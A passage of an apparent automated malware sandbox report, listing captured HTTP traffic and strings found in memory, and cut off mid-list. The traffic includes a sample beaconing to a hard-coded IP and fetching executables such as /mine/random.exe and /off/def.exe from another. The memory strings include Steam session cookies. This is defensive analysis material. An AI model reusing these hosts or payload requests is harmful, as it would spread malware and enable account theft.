Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B664000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B62E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B664000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B62E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B664000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B664000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B664000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: --autocomplete-popup-separator-color*://www.facebook.com/platform/impression.php*resource://gre/modules/AddonManager.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000003.2199555514.000000000065A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2208549142.000000000065A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2208378374.000000000064D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamco equals www.youtube.com (Youtube)
Source: ee8d47a049.exe, 0000000E.00000003.3035132023.00000000011B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: ee8d47a049.exe, 0000000C.00000003.2883867156.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883770636.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.bet# equals www.youtube.com (Youtube)
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cbcfeb0e5371aba24e9977faccad43253; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=3dc89035b58a2109d32b7c7d; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26105Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 24 Oct 2024 07:08:34 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000003.2199555514.000000000064D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: HeContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cbcfeb0e5371aba24e9977faccad43253; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=27c225fad82f110f13c77afc; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35741Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 24 Oct 2024 07:07:11 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A856000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", 